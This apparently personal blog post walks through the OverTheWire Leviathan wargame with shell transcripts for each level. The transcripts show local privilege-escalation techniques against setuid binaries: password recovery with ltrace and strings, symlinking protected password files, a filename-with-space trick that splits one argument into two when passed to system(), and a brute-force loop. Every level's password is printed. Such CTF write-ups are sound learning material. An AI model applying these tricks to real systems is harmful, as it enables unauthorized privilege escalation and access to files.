Posts tagged leviathan

Leviathan Walkthrough

posted on 2015-01-22 01:38:57

http://overthewire.org/wargames/leviathan/ is just as much fun as bandit, which I covered in eralier post here.

prerequisites

Just go and have a look at the bandit post mentioned above

solutions

Here is what I have found by now.

level 0

leviathan0@melinda:~$ ls -alh
total 24K
drwxr-xr-x   3 root       root       4.0K Nov 14 10:32 .
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ..
drwxr-x---   2 leviathan1 leviathan0 4.0K Nov 14 10:32 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
leviathan0@melinda:~$ cd .backup/
leviathan0@melinda:~/.backup$ ls -alh
total 140K
drwxr-x--- 2 leviathan1 leviathan0 4.0K Nov 14 10:32 .
drwxr-xr-x 3 root       root       4.0K Nov 14 10:32 ..
-rw-r----- 1 leviathan1 leviathan0 131K Nov 14 10:32 bookmarks.html
leviathan0@melinda:~/.backup$ grep leviathan1 *
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

pw is rioGegei8m, as can be seen in the last line.

level 1

ltrace for tracing libraries is the key here.

leviathan1@melinda:~$ ls -alhF
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7.4K Nov 14 10:32 check*
leviathan1@melinda:~$ ./check 
password: 


Wrong password, Good Bye ...
leviathan1@melinda:~$ ltrace ./check 
__libc_start_main(0x804852d, 1, 0xffffd784, 0x80485f0 <unfinished ...>
printf("password: ")                             = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password: 
)     = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642
)     = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642
)     = 10
strcmp("\n\n\n", "sex")                          = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)             = 29
+++ exited (status 0) +++
leviathan1@melinda:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ cd /                  
$ pwd
/
$ find . -iname "*leviathan*2*" | less

Then in less, use & to show just lines matching your search content, and type leviathan2 and hit enter, which will give you this:

./etc/leviathan_pass/leviathan2
./home/leviathan2
~
~
~
~
~
~
~
~
~
& (END)

So:

$ cat ./etc/leviathan_pass/leviathan2
ougahZi8Ta

level 2

:(

leviathan2@melinda:~$ ls -alh
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 .
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan3 leviathan2 7.4K Nov 14 10:32 printfile
leviathan2@melinda:~$ ./printfile 
*** File Printer ***
Usage: ./printfile filename
leviathan2@melinda:~$ mkdir -p /tmp/sjas/
leviathan2@melinda:~$ ln -s /etc/leviathan_pass/leviathan3 /tmp/sjas/lvl2
leviathan2@melinda:~$ ls -alh /tmp/sjas/lvl2 
lrwxrwxrwx 1 leviathan2 leviathan2 30 Jan 22 01:15 /tmp/sjas/lvl2 -> /etc/leviathan_pass/leviathan3
leviathan2@melinda:~$ touch /tmp/sjas/asdf\ lvl2
leviathan2@melinda:~$ ./printfile /tmp/sjas/lvl2\ asdf 
You cant have that file...
leviathan2@melinda:~$ touch /tmp/sjas/lvl2\ asdf
leviathan2@melinda:~$ ./printfile /tmp/sjas/lvl2\ asdf
Ahdiemoo1j
/bin/cat: asdf: No such file or directory

And we get the password: Ahdiemoo1j

This is a security flaw. But neither strace nor this here...

leviathan2@melinda:~$ ltrace ./printfile /tmp/sjas/lvl2\ asdf
__libc_start_main(0x804852d, 2, 0xffffd754, 0x8048600 <unfinished ...>
access("/tmp/sjas/lvl2 asdf", 4)                 = 0
snprintf("/bin/cat /tmp/sjas/lvl2 asdf", 511, "/bin/cat %s", "/tmp/sjas/lvl2 asdf") = 28
system("/bin/cat /tmp/sjas/lvl2 asdf"/bin/cat: /tmp/sjas/lvl2: Permission denied
/bin/cat: asdf: No such file or directory
 <no return ...>
 --- SIGCHLD (Child exited) ---
 <... system resumed> )                           = 256
 +++ exited (status 0) +++

... helped my understanding much.

By using the space in the filename, this works. If used only the link, it wouldn't work. I cannot tell you more, since I googled this as I wasn't smart enough to figure this out by myself.

See https://www.gnu.org/software/libc/manual/html_node/Testing-File-Access.html for more info, if you happen to program C.

level 3

 1  leviathan3@melinda:~$ ls -alh
 2  total 28K
 3  drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 .
 4  drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ..
 5  -rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
 6  -rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
 7  -rw-r--r--   1 root       root        675 Apr  9  2014 .profile
 8  -r-sr-x---   1 leviathan4 leviathan3 7.4K Nov 14 10:32 level3
 9  leviathan3@melinda:~$ ./level3 
10  Enter the password> 
11  bzzzzzzzzap. WRONG
12  leviathan3@melinda:~$ ltrace ./level3 
13  __libc_start_main(0x8048450, 1, 0xffffd784, 0x8048600 <unfinished ...>
14  __printf_chk(1, 0x80486ca, 0x804860b, 0xf7fca000) = 20
15  fgets(Enter the password>                
16  "\n", 256, 0xf7fcac20)                     = 0xffffd5bc
17  puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
18  )                       = 19
19  +++ exited (status 0) +++
20  leviathan3@melinda:~$ strings ./level3 
21  /lib/ld-linux.so.2
22  libc.so.6
23  _IO_stdin_used
24  __printf_chk
25  puts
26  __stack_chk_fail
27  stdin
28  fgets
29  system
30  __libc_start_main
31  __gmon_start__
32  GLIBC_2.3.4
33  GLIBC_2.4
34  GLIBC_2.0
35  PTRhp
36  QVhP
37  [^_]
38  snlprintf
39  [You've got shell]!
40  /bin/sh
41  bzzzzzzzzap. WRONG
42  Enter the password> 
43  ;*2$",
44  secret
45  leviathan3@melinda:~$ ./level3 
46  Enter the password> snlprintf
47  [You've got shell]!
48  $ id
49  uid=12003(leviathan3) gid=12003(leviathan3) euid=12004(leviathan4) groups=12004(leviathan4),12003(leviathan3)
50  $ cat /etc/leviathan_pass/leviathan4
51  vuH0coox6m

Line 37 should be the if-clause or something, 38 the string to test against. Line 39 and 40 are the branch for true whereas 41 is the branch for false?

So much for some wild guesswork.

level 4

leviathan4@melinda:~$ ls -lahF
total 24K
drwxr-xr-x   3 root root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root root        675 Apr  9  2014 .profile
dr-xr-x---   2 root leviathan4 4.0K Nov 14 10:32 .trash/
leviathan4@melinda:~$ cd .trash/
leviathan4@melinda:~/.trash$ ls -lahF
total 16K
dr-xr-x--- 2 root       leviathan4 4.0K Nov 14 10:32 ./
drwxr-xr-x 3 root       root       4.0K Nov 14 10:32 ../
-r-sr-x--- 1 leviathan5 leviathan4 7.3K Nov 14 10:32 bin*
leviathan4@melinda:~/.trash$ ./bin 
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010 
leviathan4@melinda:~/.trash$ ltrace ./bin 
__libc_start_main(0x80484cd, 1, 0xffffd754, 0x80485c0 <unfinished ...>
fopen("/etc/leviathan_pass/leviathan5", "r")      = 0
+++ exited (status 255) +++
leviathan4@melinda:~/.trash$ for i in `./bin`; do echo "ibase=2;$i" | bc; done
84
105
116
104
52
99
111
107
101
105
10
leviathan4@melinda:~/.trash$ for i in `./bin`; do j=$(echo "ibase=2;$i" | bc); printf "\x$(printf %x $j)"; done
Tith4cokei

This was some ugly stuff at the end. Once you see the binary values, and converting them to decimals, the numbers look like ascii character numbers. The decoding printf statement is from stackoverflow.com.

level 5

leviathan5@melinda:~$ ls -lahF
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan6 leviathan5 7.5K Nov 14 10:32 leviathan5*
leviathan5@melinda:~$ ./leviathan5 
Cannot find /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5 
__libc_start_main(0x80485ed, 1, 0xffffd774, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                      = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5 
UgaoFee4li

No explanation here, as this one was rather easy.

level 6

leviathan6@melinda:~$ ls -lahF
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan7 leviathan6 7.4K Nov 14 10:32 leviathan6*
leviathan6@melinda:~$ ./leviathan6 
usage: ./leviathan6 <4 digit code>
leviathan6@melinda:~$ ltrace ./leviathan6 
__libc_start_main(0x804850d, 1, 0xffffd774, 0x8048590 <unfinished ...>
printf("usage: %s <4 digit code>\n", "./leviathan6"usage: ./leviathan6 <4 digit code>
) = 35
exit(-1 <no return ...>
+++ exited (status 255) +++
leviathan6@melinda:~$ for i in `seq 0000 9999`; do echo $i; ./leviathan6 $i; done
Wrong
0
Wrong
1
Wrong
2
Wrong
3
Wrong
4


... this takes a while.


Wrong
7120
Wrong
7121
Wrong
7122
Wrong
7123
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

Bruteforcing this with a bash one-liner is the easiest option to find '7123'. Cat the PW file once you have the leviathan7 shell and you are done.

level 7

leviathan7@melinda:~$ ls -lahF
total 24K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r--r-----   1 leviathan7 leviathan7  178 Nov 14 10:32 CONGRATULATIONS
leviathan7@melinda:~$ cat CONGRATULATIONS 
Well Done, you seem to have used a *nix system before, now try something more serious.
(Please don't post writeups, solutions or spoilers about the games on the web. Thank you!)
leviathan7@melinda:~$ 

Ooooops.

This blog covers .csv, .htaccess, .pfx, .vmx, /etc/crypttab, /etc/network/interfaces, /etc/sudoers, /proc, 10.04, 14.04, AS, ASA, ControlPanel, DS1054Z, GPT, HWR, Hyper-V, IPSEC, KVM, LSI, LVM, LXC, MBR, MTU, MegaCli, PHP, PKI, R, RAID, S.M.A.R.T., SNMP, SSD, SSL, TLS, TRIM, VEEAM, VMware, VServer, VirtualBox, Virtuozzo, XenServer, acpi, adaptec, algorithm, ansible, apache, apachebench, apple, applet, arcconf, arch, architecture, areca, arping, asa, asdm, autoconf, awk, backup, bandit, bar, bash, benchmarking, binding, bitrate, blackarmor, blockdev, blowfish, bochs, bond, bonding, booknotes, bootable, bsd, btrfs, buffer, c-states, cache, caching, ccl, centos, certificate, certtool, cgdisk, cheatsheet, chrome, chroot, cisco, clamav, cli, clp, clush, cluster, coleslaw, colorscheme, common lisp, configuration management, console, container, containers, controller, cron, cryptsetup, csync2, cu, cups, cygwin, d-states, database, date, db2, dcfldd, dcim, dd, debian, debug, debugger, debugging, decimal, desktop, df, dhclient, dhcp, diff, dig, display manager, dm-crypt, dmesg, dmidecode, dns, docker, dos, drivers, dtrace, dtrace4linux, du, dynamictracing, e2fsck, eBPF, ebook, efi, egrep, emacs, encoding, env, error, ess, esx, esxcli, esxi, ethtool, evil, expect, exportfs, factory reset, factory_reset, factoryreset, fail2ban, fbsd, fdisk, fedora, file, filesystem, find, fio, firewall, firmware, fish, flashrom, forensics, free, freebsd, freedos, fritzbox, fsck, fstrim, ftp, ftps, g-states, gentoo, ghostscript, git, git-filter-branch, github, gitolite, global, gnutls, gradle, grep, grml, grub, grub2, guacamole, hardware, haskell, hdd, hdparm, hellowor, hex, hexdump, history, howto, htop, htpasswd, http, httpd, https, i3, icmp, ifenslave, iftop, iis, imagemagick, imap, imaps, init, innoDB, innodb, inodes, intel, ioncube, ios, iostat, ip, iperf, iphone, ipmi, ipmitool, iproute2, ipsec, iptables, ipv6, irc, irssi, iw, iwconfig, iwlist, iwlwifi, jailbreak, jails, java, javascript, javaws, js, juniper, junit, kali, kde, kemp, kernel, keyremap, kill, kpartx, krypton, lacp, lamp, languages, ldap, ldapsearch, less, leviathan, liero, lightning, links, linux, linuxin3months, lisp, list, livedisk, lmctfy, loadbalancing, locale, log, logrotate, looback, loopback, losetup, lsblk, lsi, lsof, lsusb, lsyncd, luks, lvextend, lvm, lvm2, lvreduce, lxc, lxde, macbook, macro, magento, mailclient, mailing, mailq, manpages, markdown, mbr, mdadm, megacli, micro sd, microsoft, minicom, mkfs, mktemp, mod_pagespeed, mod_proxy, modbus, modprobe, mount, mouse, movement, mpstat, multitasking, myISAM, mysql, mysql 5.7, mysql workbench, mysqlcheck, mysqldump, nagios, nas, nat, nc, netfilter, networking, nfs, nginx, nmap, nocaps, nodejs, numberingsystem, numbers, od, onyx, opcode-cache, openVZ, openlierox, openssl, openvpn, openvswitch, openwrt, oracle linux, org-mode, os, oscilloscope, overview, parallel, parameter expansion, parted, partitioning, passwd, patch, pct, pdf, performance, pfsense, php, php7, phpmyadmin, pi, pidgin, pidstat, pins, pkill, plasma, plesk, plugin, posix, postfix, postfixadmin, postgres, postgresql, poudriere, powershell, preview, profiling, prompt, proxmox, ps, puppet, pv, pveam, pvecm, pvesm, pvresize, python, qemu, qemu-img, qm, qmrestore, quicklisp, quickshare, r, racktables, raid, raspberry pi, raspberrypi, raspbian, rbpi, rdp, redhat, redirect, registry, requirements, resize2fs, rewrite, rewrites, rhel, rigol, roccat, routing, rs0485, rs232, rsync, s-states, s_client, samba, sar, sata, sbcl, scite, scp, screen, scripting, seafile, seagate, security, sed, serial, serial port, setup, sftp, sg300, shell, shopware, shortcuts, showmount, signals, slattach, slip, slow-query-log, smbclient, snmpget, snmpwalk, software RAID, software raid, softwareraid, sophos, spacemacs, spam, specification, speedport, spi, sqlite, squid, ssd, ssh, ssh-add, sshd, ssl, stats, storage, strace, stronswan, su, submodules, subzone, sudo, sudoers, sup, swaks, swap, switch, switching, synaptics, synergy, sysfs, systemd, systemtap, tar, tcpdump, tcsh, tee, telnet, terminal, terminator, testdisk, testing, throughput, tmux, todo, tomcat, top, tput, trafficshaping, ttl, tuning, tunnel, tunneling, typo3, uboot, ubuntu, ubuntu 16.04, udev, uefi, ulimit, uname, unetbootin, unit testing, upstart, uptime, usb, usbstick, utf8, utm, utm 220, ux305, vcs, vgchange, vim, vimdiff, virtualbox, virtualization, visual studio code, vlan, vmstat, vmware, vnc, vncviewer, voltage, vpn, vsphere, vzdump, w, w701, wakeonlan, wargames, web, webdav, weechat, wget, whois, wicd, wifi, windowmanager, windows, wine, wireshark, wpa, wpa_passphrase, wpa_supplicant, x11vnc, x2x, xfce, xfreerdp, xmodem, xterm, xxd, yum, zones, zsh


Unless otherwise credited all material Creative Commons License by sjas